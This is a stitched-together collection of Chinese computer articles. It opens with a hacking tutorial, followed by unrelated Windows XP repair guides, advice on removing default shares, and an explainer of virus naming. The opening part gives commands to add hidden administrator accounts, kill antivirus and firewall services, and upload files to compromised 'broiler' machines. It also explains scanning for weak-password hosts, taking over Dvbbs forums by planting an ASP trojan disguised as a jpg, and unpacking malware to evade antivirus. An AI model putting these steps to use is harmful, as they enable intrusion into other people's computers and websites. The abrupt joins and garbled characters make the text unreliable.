net user --------查看有哪些用户

net user guest /active:yes ------ 激活guest用户

net user 用户名　密码　/add ------建立用户

net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限

二．必备命令

net start -----查看开启了哪些服务

net start 服务名-----开启服务

net stop 服务名------停止某服务

netstat -an :查看端口的网络连接情况

ipconfig :查看本地ip地址

三．关防火墙，杀毒软件命令

net stop sharedaccess ----关系统自带防火墙

pskill.exe ravmon -----杀掉瑞星软件

pskill.exe pfw ----关天网防火墙

net stop "Symantec AntiVirus"----关于诺顿企业版

net stop KAVStart------关闭金山杀毒

向肉鸡上传文件命令:

第一种方法:tftp

命令格式:tftp -i 你的公网IP get xx.exe

：计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音罖@刂瞥绦?br>sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

第二课:x-scan扫描器的使用技巧详解

一.详解x-scan的配置:

1.扫描模块设置:

1).开放服务

(2).远程控制系统

(3).nt-server弱口令-----administrator 空口令或弱口令.

(4).sql-server弱口令 ---sa 空口令或弱口令.

2.扫描IP范围设置:

(1).指定IP范围.

(2).从文件中导入IP列表.

二.x-scan在入侵中的应用:

1.对系统的综合安全检测,有针对性的入侵.

2.找肉鸡

nt-server弱口令

sql-server弱口令

3.邮箱,ftp,vnc的破解

三.x-scan入侵实例演示部分:

1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC)

2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器)

s扫描-----扫开放1433的机子

x-scan扫描-----对开放1433的机子进行弱口令探测.

第五课:网站猎手批量入侵实战演示

黑天

一.二个重点要素:

1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高.

选择技巧:一般选择论坛最低部的版权信息或程序名称.

2.检测的页面或文件: 也就是程序存在漏洞的地方

二.网站猎手批量入侵实战演示篇:

1.实战演示一:

检测的页面或文件: data/dvbbs7.mdb

关键字:Powered By ：Dvbbs Version 7.0.0

由默认数据库到拿网站webshell过程:

第一步:下载动网默认数据库

第二步:在数据库中找管理员密码

技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码.

第三步:在前台以jpg格式上传asp木马.

第四步:用备份数据库功能把jpg格式备份成我们的ASP木马.

2.演示二:

检测的页面或文件:database/bbsxp.mdb

关键字:Powered by BBSXP 7.00

3.演示三:

检测的页面或文件:upfile_flash.asp

关键字:商城

四:关于批量得webshell的其它思路

1.思路一:

到大型源码下载中心,把下载量较大的源程序,下载回来研究.

主要研究他们的默认数据库地址,默认管理账号和密码,默认后台.

然后用关键字结合网站猎手批量检测.很快就提到大量webshell

2.思路二:社会工程学批量入侵拿webshell

1.免杀

2.破解

3.程序汉化,个性修改.

二.脱壳四步骤:

第一步:查壳

常用查壳工具: PEID ,FI ,PE-SCAN 等.

第二步:找OEP

工具:ollydbg

第三步:脱壳

常用脱壳工具:

1.OD自带的脱壳插件:右键脱壳之.

2.LordPE:选择所调试进程右键,完整脱壳.

第四步:修复

Import REConstructor 1.6

三.在ollydbg脱壳中常用快捷键介绍

F2: 下断点.

F4:运行到所选择的那一行.-----遇到向上跳时用到

F7:单步进入----遇到近call时用到.

F8:单步跟踪

F9:运行程序

Shift+F9 :忽略异常运行

Alt+M:打开内存镜像

    由于操作不当、突然停电、病毒破坏或经常进行安装和 卸载 操作等情况，都可能造成系统文件丢失或损坏的故障。一般系统文件丢失后，我们可以很容易地从出现的故障提示窗口中获得受损的文件名及路径，这样修复起来便非常简单了。

    1.最常见的Rundll32.exe文件丢失

    Rundll32.exe程序顾名思义是执行32位的DLL文件，它是必不可少的系统文件，缺少了它一些项目和程序将无法执行。不过由于它的特殊性，致使它很容易被破坏，如果你在打开控制面板里的某些项目时出现“Windows 无法找到文件'C：\Windows\system32 \Rundll32.exe'”的错误提示（如图1），则可以通过如下操作来解决。

    步骤1：将Windows XP安装 光盘插入你的光驱，然后依次点击“开始→运行”。

    步骤2：在“运行”窗口中输入“expand x：\i386\rundll32.ex_c：\windows\system32 \rundll32.exe”命令并回车执行（其中“x”为光驱的盘符）。

    步骤3：修复完毕后，重新启动系统即可。

    2.DLL链接文件有“备份”

    系统中有许多DLL动态链接库文件，它们一般存放在系统盘下Windows\System32文件夹中，当运行某一程序时将会调用相应的DLL文件。而由于DLL文件是可以被多个程序共享的，所以当卸载或安装一些程序时，很容易将其一起卸载掉或进行不正确的修改操作。如果在试图打开系统信息程序，来查看系统状态时出现没有找到MFC42u.DLL文件（如图2）的提示错误，就说明该MFC42u.DLL文件已丢失了，解决这类故障的一般方法如下：

    首先，在Windows XP的安装 光盘中查找是否有MFC42u.DLL文件，如果有直接将该文件复制到Windows\System32文件夹中即可。如果是压缩格式的（类似上例中的rundll32.ex_文件），那么可使用expand命令将光盘中的文件解压到System32文件夹中。

    如果找不到MFC42u.DLL文件，也找不到其压缩格式（本例正是这种情况），那么这时在微软的搜索页面（网址为： http://search.microsoft.com/search/search.aspx？st=b&na=80&qu=&View=zh-cn ）输入“MFC42u.DLL”作为搜索关键字进行搜索，然后打开相关的搜索页面查看相关内容。根据打开的页面提示内容，要想获得这个MFC42u.Dll文件，我们可以安装微软开发的Vcredist.exe程序来获得。这样下载并安装该程序后，可在其安装文件夹中找到MFC42u.DLL文件，将其复制到System32文件夹中即可。如果你觉得这样比较麻烦，那么可到一些专业DLL文件 下载网站 进行下载，这样只要在网页中找到相应的下载链接并将其下载到相应的文件夹中即可修复。当然，如果有条件也可以在其它电脑上复制相关的文件来修复。

    小提示 ：有些DLL文件复制到相应的目录后还需要进行注册，假如System32文件夹中的abc.dll文件需要系统进行注册认证，这时可在运行窗口中执行“regsvr32 c：\windows\system32\abc.dll”命令，进行组件的注册操作即可。

    3.另类文件丢失的故障解除

    这类故障出现时一般会给出一组CLSID注册码，而不是告诉用户所损坏或丢失的文件名称，因此经常会让一些菜鸟感到不知所措。例如笔者在运行窗口中执行“gpedit.msc”命令来打开组策略时曾出现了“管理单元初始化失败”的提示窗口（如图3），点击“确定”也不能正常地打开相应的组策略（如图4），而经过检查发现是因为丢失了gpedit.dll文件所造成的，虽然窗口中没有提示所丢失的文件，但是在实际解决这类故障时也不是很难。

    其实窗口中的CLSID（Class IDoridentifier）类标识提示就是一个解决问题的线索，这是因为在注册表中会给每个对象分配一个唯一的标识，这样我们就可通过在注册表中查找，来获得相关的线索，具体方法如下。

    在“运行”窗口中执行“regedit”命令，然后在打开的注册表窗口中依次点击“编辑→查找”，然后在输入框中输入CLSID标识（本例中的CLSID标识是“{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}”），然后在搜索的类标识中选中“InProcServer32”项，接着在右侧窗口中将双击“默认”项，这时在“数值数据”中会看到“%SystemRoot%\System32\GPEdit.dll”，其中的GPEdit.dll就是本例故障所丢失或损坏的文件。这时只要将安装光盘中的相关文件解压或直接复制到相应的目录中，即可完全修复。

二、Windows XP系统的“恢复”办法

    1.让SFC命令全面修复受损文件

    如果系统因丢失了太多的系统重要文件而变得非常不稳定，那么按照前面介绍的方法一一修复，相必会让人发疯的。这时就需要使用SFC文件检测器命令，来全面的检测并修复受损的系统文件了。

    在“运行”窗口中执行“sfc /scannow”命令，这时sfc文件检测器将立即扫描所有受保护的系统文件（如图5），其间会提示用户插入Windows安装光盘。这样，在大约10分钟左右的时间里，SFC就将会检测并修复好受保护的系统文件。

    小提示 ：如果身边没有Windows XP安装盘，但之前在硬盘上备份了安装盘文件时，也可以按照如下设置，使SFC通过硬盘上的安装文件来恢复系统文件。

    在注册表编辑器窗口中，依次展开“HKEY_LOCAL _MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Setup”子键，然后在右侧窗口中修改Installation Sources、ServicePackSourcePath和SourcePath三个键值为硬盘上的系统安装程序路径，例如Windows XP的安装源文件存放在G盘WinXP文件夹中，那么修改以上三个键的键值为“G：\WinXP”。这样再使用SFC命令时，则可以直接使用硬盘上的安装文件来恢复系统，不需要再插入安装光盘了。

    2.机会常在——“最后一次正确的配置”

    有时，我们在给一个新添的硬件设备安装驱动程序 （例如安装新的显卡驱动） 后，由于设置的驱动程序与当前系统不符或设备驱动程序太新而系统不识别时，往往会造成系统的不稳定、蓝屏或无法启动系统等故障。这时就可以使用系统所提供的“最后一次正确的配置”项，将系统恢复到以前良好的状态。

    重新启动系统，并按住F8键，这时将会打开“Windows高级选项菜单”窗口，在所列出的选项中，选择“最后一次正确的配置”项（如图6），在按回车键前确保已经关闭了键盘上的Num Lock数字键，这样系统就将以先前良好的系统状态继续运行了。

    小提示 ：当选择“最后一次正确的配置”时，系统将还原注册表中的“HKEY_LOCAL_MACHINE\ System\CurrentControlSet”子键，但对其它注册项所做的修改将不会被还原，所以采用此法不能对损坏或丢失的系统文件进行恢复。

    3.别忘了还有“系统还原”

    使用“最后一次正确的配置”只能还原最近的一次操作，而使用“系统还原”功能则可获得更多的选择。

    在使用“系统还原”时，首先要确保以管理员的身份登录系统，如果不能按正常方式登录系统，则可以在安全模式中登录。进入系统后，依次点击“开始→所有程序→附件→系统工具→系统还原”，在打开的窗口中选择“恢复我的计算机到一个较早的时间”项，并点击“下一步”，接着在“选择一个还原点”窗口左边的日期列表中找到一个最近的还原点日期，然后在右侧窗列表中选择其中一个创建的还原点（如图7），确认后系统将还原恢复以前的系统配置，最后重新启动系统即可。

    小提示 ：如果所选择的还原点不正确，那么我们可以撤消还原，只要在打开的系统还原欢迎窗口中选中“撤销我的上次的恢复”项，这样在撤销的过程中系统将恢复到初始的系统配置状态。

三、启动型故障——让故障恢复控制台出手

    如果在安全模式或其它启动选项都无法启动Windows XP时，很可能是因为启动文件受损造成的，这时便要请出Windows XP的故障恢复控制台来恢复了。它也是修复绝大部分系统故障的终级解决方案。

    1.安装和登录“故障恢复控制台”

    在光驱中插入Windows XP安装光盘，然后在“运行”窗口输入“X：\i386\winnt32.exe /cmdcons”命令（“X”为光驱盘符），执行后将出现“Windows 安装”对话框（如图8）。点击“是”开始安装，当成功安装并启动系统时，我们将会在启动菜单上看到“Microsoft Windows XP Recovery Console”项（如图9），选中该项回车后即可进入。

    而在进入“故障恢复控制台”前，系统会提示“要登录到哪个Windows XP安装”，这时可输入系统所对应的数字“1”。接着系统会提示输入系统管理员密码，可使用任意一个管理员帐户的密码进行登录，如果密码为空则直接按回车键进入，当密码正确后即可进入“故障恢复控制台”状态（如图10）。

    小提示 ：我们也可以直接使用Windows XP安装光盘启动，然后选择安装系统，在扫描磁盘操作后选择进入“故障恢复控制台”项，即可直接在光盘上运行“故障恢复控制台”。

    2.解决NTLDR文件丢失

    在突然停电或在高版本系统的基础上安装低版本的操作系统时，很容易造成NTLDR文件的丢失，这样在登录系统时就会出现“NTLDR is Missing Press any key to restart”的故障提示，其可在“故障恢复控制台”中进行解决。

    进入故障恢复控制台，然后插入Windows XP安装光盘，接着在故障恢复控制台的命令状态下输入“copy x：\i386\ntldr c：\”命令并回车即可（“x”为光驱所在的盘符），然后执行“copy x：\i386\ntdetect.com c：\”命令，如果提示是否覆盖文件，则键入“y”确认，并按回车键。

    3.Boot.ini文件也要修复

    在遇到NTLDR文件丢失的故障时，boot.ini文件多半也会出现丢失或损坏的情况。这样在进行了上面修复NTLDR的操作后，还要在故障恢复控制台中执行“bootcfg /redirect”命令来重建Boot.ini文件。最后执行“fixboot c：”命令，在提示是否进行操作时输入“y”确认并回车，这样Windows XP的系统分区便可写入到启动扇区中。当执行完全部命令后，键入“exit”命令退出故障恢复控制台，重新启动后系统即可恢复如初。

    4.在故障恢复控制台中彻底清除“毒源”

    目前的一些新型病毒，采用注册为系统服务的形式驻留在系统中。这样即使使用杀毒软件检查出其所在位置（例如C：\Windows\System32\wsock32.dll），也不能正常清除。而在“任务管理器”中也无法结束这类病毒文件的进程，甚至一些破坏性较强的病毒程序将使系统完全瘫痪。这时就可在故障恢复控制台状态下，执行“del c：\windows\system32\wsock32.dll”命令，将其组件进行彻底删除，最后进入系统中利用杀毒软件再进行清除操作即可。

    由于Windows XP的“故障恢复控制台”功能非常强大，限于篇幅这里不能对其进行详细介绍了。大家可在其命令行状态下执行“help”命令即可查看所有的操作命令格式。对于每一条命令的使用，也可以采用“命令名　/？”的格式来查看该命令的描述及使用方法。

　　功能配置法

　　这种方法是通过Windows XP或Windows 2003系统中的msconfig命令，来实现切断服务器默认共享“通道”目的的。使用该方法时，可以按照如下步骤来进行：

　　依次单击“开始”/“运行”命令，在随后出现的系统运行设置框中，输入字符串命令“msconfig”，单击“确定”按钮后，打开一个标题为系统配置实用程序的设置窗口;

　　单击该窗口中的“服务”选项卡，在其后打开的如图1所示的选项设置页面中，找到其中的“Server”项目，并检查该项目前面是否有勾号存在，要是有的话必须将其取消掉，最后单击一下“确定”按钮，以后重新启动服务器系统时，服务器的C盘、D盘等就不会被自动设置成默认共享了。

　　小提示：尽管Windows 2000服务器系统没有系统配置实用程序功能，但考虑到该系统的内核与Windows 2003系统内核比较接近，因此你可以将Windows 2003系统中的msconfig.exe文件和msconfig.chm文件直接复制到Windows 2000系统目录中，以后你也可以在该系统的运行对话框中，直接启动系统配置实用程序功能了。如果在启动该功能的过程中，遇到有错误提示窗口弹出时，你可以不必理会，不停单击“取消”按钮就可以看到系统配置实用程序设置窗口了。

　　“强行”停止法

　　所谓“强行”停止法，其实就是借助Windows服务器的计算机管理功能，来对已经存在的默认共享文件夹，“强制”停止共享命令，以便让其共享状态取消，同时确保这些文件夹下次不能被自动设置成共享。在“强行”停止默认共享文件夹的共享状态时，你可以按照下面的步骤来进行：

　　依次单击“开始”/“运行”命令，在打开的系统运行设置框中，输入字符串命令“compmgmt.msc”，单击“确定”按钮后，打开打开Windows服务器系统的“计算机管理”界面;

　　在该界面的左侧列表区域中，用鼠标逐一展开“系统工具”、“共享文件夹”、“共享”文件夹，在对应“共享”文件夹右边的子窗口中，你将会发现服务器系统中所有已被共享的文件文件夹都被自动显示出来了，其中共享名称后面带有“$”符号的共享文件夹，就是服务器自动生成的默认共享文件夹;

　　要取消这些共享文件夹的共享状态，你只要先用鼠标逐一选中它们，然后再用右键单击之，在其后打开的快捷菜单中，选中“停止共享”选项，随后屏幕上将打开一个如图2所示的对话框，要求你确认一下是否真的想停止已经选择的共享，此时你再单击一下“是”按钮，所有选中的默认共享文件夹的共享标志就会自动消失了，这表明它们的共享状态已经被“强行”停止了，以后哪怕是重新启动服务器系统，服务器的C盘、D盘也不会被自动设置成默认共享了。

　　逐一删除法

　　所谓“逐一删除法”，其实就是借助Windows服务器内置的“net share”命令，来将已经处于共享状态的默认共享文件夹，一个一个地删除掉(当然这里的删除，仅仅表示删除默认共享文件夹的共享状态，而不是删除默认文件夹中的内容)，但该方法有一个致命的缺陷，就是无法实现“一劳永逸”的删除效果，只要服务器系统重新启动一下，默认共享文件夹又会自动生成了。在使用该方法删除默认共享文件夹的共享状态时，可以参考如下的操作步骤：

　　首先在系统的开始菜单中，执行“运行”命令，打开系统运行设置框，在该对话框中输入字符串命令“cmd”后，再单击“确定”按钮，这样Windows服务器系统就会自动切换到DOS命令行工作状态;

　　然后在DOS命令行中，输入字符串命令“net share c$ /del”，单击回车键后，服务器中C盘分区的共享状态就被自动删除了;如果服务器中还存在D盘分区、E盘分区的话，你可以按照相同的办法，分别执行字符串命令“net share d$ /del”、“net share e$ /del”来删除它们的共享状态;

　　此外，对应IP$、Admin$之类的默认共享文件夹，你们也可以执行字符串命令“net share ipc$ /del”、“net share admin$ /del”，来将它们的隐藏共享状态取消，这样的话非法攻击者就无法通过这些隐藏共享“通道”，来随意攻击Windows服务器了。

　　“自动”删除法

　　如果服务器中包含的隐藏共享文件夹比较多的话，依次通过“net share”命令来逐一删除它们时，将显得非常麻烦。其实，我们可以自行创建一个批处理文件，来让服务器一次性删除所有默认共享文件夹的共享状态。在创建批处理文件时，只要打开类似记事本之类的文本编辑工具，并在编辑窗口中输入下面的源代码命令：

　　@echo off

　　net share C$ /del

　　net share D$ /del

　　net share ipc$ /del

　　net share admin$ /del

　　……

　　完成上面的代码输入操作后，再依次单击文本编辑窗口中的“文件”/“保存”菜单命令，在弹出的文件保存对话框中输入文件名为“delshare.bat”，并设置好具体的保存路径，再单击一下“保存”按钮，就能完成自动删除默认共享文件夹的批处理文件创建工作了。以后需要删除这些默认共享文件夹的共享状态时，只要双击“delshare.bat”批处理文件，服务器系统中的所有默认共享“通道”就能被自动切断了。

    其实只要我们掌握一些病毒的命名规则，我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。

    世界上那么多的病毒，反病毒公司为了方便管理，他们会按照病毒的特性，将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样，但大体都是采用一个统一的命名方法来命名的。

    一般格式为：<病毒前缀>.<病毒名>.<病毒后缀> .

    病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ，蠕虫病毒的前缀是 Worm 等等还有其他的。

    病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“ CIH ”，还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。

    病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如Worm.Sasser.b　就是指 振荡波蠕虫病毒的变种B，因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多（也表明该病毒生命力顽强 ^_^），可以采用数字与字母混合表示变种标识。

    综上所述，一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型，就可以对这个病毒有个大概的评估（当然这需要积累一些常见病毒类型的相关知识，这不在本文讨论范围）。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。

    下面附带一些常见的病毒前缀的解释（针对我们用得最多的Windows操作系统）：

    1、系统病毒

    系统病毒的前缀为：Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感windows操作系统的 *.exe 和 *.dll 文件，并通过这些文件进行传播。如CIH病毒。

    2、蠕虫病毒

    蠕虫病毒的前缀是：Worm.这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮差（发带毒邮件） 等。

    3、木马病毒、黑客病毒

    木马病毒其前缀是：Trojan，黑客病毒前缀名一般为 Hack .木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的，即木马病毒负责侵入用户的电脑，而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ，还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 .这里补充一点，病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能（这些字母一般都为“密码”的英文“password”的缩写）一些黑客程序如：网络枭雄（Hack.Nether.Client）等。

    4、脚本病毒

    脚本病毒的前缀是：Script.脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒，如红色代码（Script.Redlof）——可不是我们的老大代码兄哦^_^.脚本病毒还会有如下前缀：VBS、JS（表明是何种脚本编写的），如欢乐时光（VBS.Happytime）、十四日（Js.Fortnight.c.s）等。

    5、宏病毒

    其实宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。宏病毒的前缀是：Macro，第二前缀是：Word、Word97、Excel、Excel97（也许还有别的）其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀，格式是：Macro.Word97；凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀，格式是：Macro.Word；凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀，格式是：Macro.Excel97；凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀，格式是：Macro.Excel，依此类推。该类病毒的公有特性是能感染OFFICE系列文档，然后通过OFFICE通用模板进行传播，如：著名的美丽莎（Macro.Melissa）。

    6、后门病毒

    后门病毒的前缀是：Backdoor.该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot .

    7、病毒种植程序病毒

    这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者（Dropper.BingHe2.2C）、MSN射手（Dropper.Worm.Smibag）等。

    8.破坏性程序病毒

    破坏性程序病毒的前缀是：Harm.这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘（Harm.formatC.f）、杀手命令（Harm.Command.Killer）等。

    9.玩笑病毒

    玩笑病毒的前缀是：Joke.也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼（Joke.Girlghost）病毒。

    10.捆绑机病毒

    捆绑机病毒的前缀是：Binder.这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ（Binder.QQPass.QQBin）、系统杀手（Binder.killsys）等。以上为比较常见的病毒前缀，有时候我们还会看到一些其他的，但比较少见，这里简单提一下：

    DoS：会针对某台主机或者服务器进行DoS攻击；

    Exploit：会自动通过溢出对方或者自己的系统漏洞来传播自身，或者他本身就是一个用于Hacking的溢出工具；

    HackTool：黑客工具，也许本身并不破坏你的机子，但是会被别人加以利用来用你做替身去破坏别人。

    你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况，达到知己知彼的效果。在杀毒无法自动查杀，打算采用手工方式的时候这些信息会给你很大的帮助。